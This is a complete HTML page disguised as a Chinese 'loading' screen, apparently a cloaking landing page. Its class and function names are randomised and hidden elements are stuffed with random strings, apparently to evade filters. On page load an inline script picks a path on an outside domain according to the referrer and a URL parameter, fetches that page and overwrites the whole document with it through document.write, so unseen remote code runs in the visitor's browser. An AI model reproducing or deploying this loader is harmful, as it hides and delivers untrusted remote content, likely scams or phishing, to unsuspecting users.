<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bWjpSmaPX2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bWjpSmaPX2 .lF41xpth {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bWjpSmaPX2 .content {
            line-height: 50px;
            text-align: center
        }

        .bWjpSmaPX2 .img {
            width: 100%
        }

        .bWjpSmaPX2 .K9QKIntf8j {
            text-align: center
        }

        .bWjpSmaPX2 .K9QKIntf8j span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bWjpSmaPX2 .K9QKIntf8j span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bWjpSmaPX2 .K9QKIntf8j span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bWjpSmaPX2 .K9QKIntf8j span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bWjpSmaPX2 .K9QKIntf8j span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bWjpSmaPX2 .K9QKIntf8j span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bWjpSmaPX2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cZCzwH5SD6tp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OsEKI = cZCzwH5SD6tp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OsEKI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OsEKI +".html?a=share";
		}
		
        dyxNsQi=url+"#"+new Date().getTime();
        dyxNsQi && function() {
            $.get(dyxNsQi, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>FBzLJ4Zue7Tiw</span>
<b style='display:none' >qnyjVvWH7Fsyr0l9gxiyBO7dPUHfEQ6xKvDh4gb8OBNv50QMCRVNh8yjTVQbjafydhUu7JZIAC</b>
<b style='display:none' >qnyjVvWH7Fsyr0l9gxiyBO7dPUHfEQ6xKvDh4gb8OBNv50QMCRVNh8yjTVQbjafydhUu7JZIAC</b>
<div style='display:none'>u2zwTstvdN39BkuvHMQTm339flqgNGJrNkXAzEiEG8C</div>
<span style='display:none'>FBzLJ4Zue7Tiw</span>
<div style='display:none'>u2zwTstvdN39BkuvHMQTm339flqgNGJrNkXAzEiEG8C</div>
<img  src='' style='display:none'><div class="bWjpSmaPX2">
    <div class="lF41xpth">
        <div class="K9QKIntf8j">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >ODRGp24WgldDdzgKU4rRc5g8F2p3u0L39fl7mF8MqozBUfQpgS7RzH4yoiADyHNEHUD2uFs0rgxj2RT</li>
<ul style='display:none' >b3sYxM3xwAFyZWqapPMIZzuDbtaPcxjXtoFgUpnysVWRSaMec7JYa2fZTiWfnkhdfJdc</ul>
<p  style='display:none'>y2JXCfNA5obmC78TwRFUHHxhXHPOUvLGqVQavtiAI6UiKsXEpftMbs1Eltv9qs69Oi</p>
<span style='display:none'>dBS4FNjDjl8kSbhuTpTmQMiUhUMhaud2W7oGCmY2UPQe8SeNSmQX2fY6OfJRa2h3XcLXiiNX9XA</span>
<a  href='#' style='display:none'>Bh9HIUTbtjSPixnA67uv</a></body>
</html>